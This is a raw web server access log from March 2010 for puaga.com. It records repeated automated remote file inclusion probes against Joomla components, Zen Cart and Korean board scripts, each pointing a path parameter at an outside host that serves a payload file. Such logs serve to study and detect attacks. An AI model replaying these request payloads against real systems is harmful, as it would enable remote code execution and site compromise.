58.150.99.144 - - [01/Mar/2010:06:16:42 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:16:57 -0800] "GET /logs/access_100209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:16:57 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:16:57 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:17:00 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:17:01 -0800] "GET /logs/access_100125.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:06:17:23 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:06:17:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:06:17:23 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.175.94.146 - - [01/Mar/2010:06:17:29 -0800] "GET /orange_g/forum/index.php HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "puaga.com"
58.150.99.144 - - [01/Mar/2010:06:17:33 -0800] "GET /logs/access_100212.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:17:43 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:17:43 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:17:43 -0800] "GET /logs/access_100217.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:17:44 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:17:44 -0800] "GET /logs/access_100210.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:17:44 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:17:45 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:06:18:02 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:18:34 -0800] "GET /logs/access_100212.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:18:42 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:18:42 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:18:46 -0800] "GET /logs/access_100125.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:18:54 -0800] "GET /logs/access.log//components/errors.php?error=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:18:54 -0800] "GET /components/errors.php?error=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:18:54 -0800] "GET /logs//components/errors.php?error=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:19:38 -0800] "GET /logs/access_100123.log//components/errors.php?error=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:50 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:50 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:50 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:54 -0800] "GET /logs/access_100210.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:56 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:56 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:56 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:06:19:56 -0800] "GET /logs/access_100210.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:21:00 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:21:00 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:21:01 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:10 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:10 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:10 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:21:11 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:12 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:12 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:12 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:21:30 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:38 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:21:42 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:22:25 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:22:34 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:47 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:47 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:51 -0800] "GET /logs/access_100210.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:58 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:58 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:58 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:22:58 -0800] "GET /logs/access_100210.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:24:44 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:25:15 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:25:15 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:25:15 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:25:17 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:25:17 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:25:50 -0800] "GET /logs/access_100202.log//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:26:09 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:26:09 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:26:10 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.34 - - [01/Mar/2010:06:26:21 -0800] "GET /ideal/forum/viewtopic.php?p=17637 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:26:32 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:27:12 -0800] "GET /logs//errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:27:21 -0800] "GET /errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:27:21 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:27:21 -0800] "GET /logs//errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:27:28 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:27:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:27:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:27:43 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:27:58 -0800] "GET /logs/access_100224.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:27:58 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:27:59 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:27:59 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:27:59 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:28:00 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:06:28:36 -0800] "GET /errors.php?error=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:06:28:36 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:06:28:36 -0800] "GET /logs//errors.php?error=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:28:54 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:29:14 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:29:22 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:06:30:01 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:30:26 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:30:26 -0800] "GET /logs/access_100211.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:30:26 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:30:36 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:30:36 -0800] "GET /logs/access_100206.log%20%20//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:30:36 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:30:52 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:30:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:31:13 -0800] "GET /logs/access_100202.log%20%20//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:31:13 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:31:15 -0800] "GET /logs/access_100131.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:31:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:31:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:31:53 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:32:03 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:32:05 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:32:39 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:06:33:05 -0800] "GET /logs/access_100218.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:06:33:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:06:33:05 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:33:10 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
